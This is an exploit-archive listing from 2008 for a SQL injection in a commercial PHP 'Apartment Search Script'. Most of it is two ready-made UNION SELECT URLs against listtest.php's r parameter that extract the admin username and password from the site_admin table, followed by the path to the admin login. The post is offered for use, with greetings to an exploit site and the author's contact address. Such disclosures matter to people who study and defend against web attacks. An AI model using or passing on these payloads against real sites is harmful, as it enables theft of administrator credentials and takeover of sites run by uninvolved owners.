[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Apartment Search Script (listtest.php r) SQL Injection Vulnerability
# Published : 2008-04-19
# Author : Crackers_Child
# Previous Title : PHP-Fusion <= 6.01.14 Remote Blind SQL Injection Exploit
# Next Title : XOOPS Module Recipe (detail.php id) SQL Injection Vulnerability
$ Script : Apartment Search Script SQL Injection Vulnerability
$ Script Info : http://www.yourfreeworld.com/script/apartment.asp
$ Script Price : Only $79
$ Demo : http://www.downlinegoldmine.com/apartment/
$ Author : Crackers_Child
$ Contact : cashr00t@hotmail.com
$ Note : Erbabi ile vurulduysak sirtimizdan neyleyelim.Bir Yarali Kurt Misali
$ Note : Her Yanimiz it Tuzagi . . .
$ Username Exp : www.x.com/script_path/listtest.php?r=-1/**/union/**/select/**/1,admin%20from%20site_admin/*
$ Password Exp : www.x.com/script_path/listtest.php?r=-1/**/union/**/select/**/1,password%20from%20site_admin/*
$ Admin Login : /Site_Admin/
$ Greetz : Milw0rm.Com & All Peace Warriors
# www.Syue.com [2008-04-19]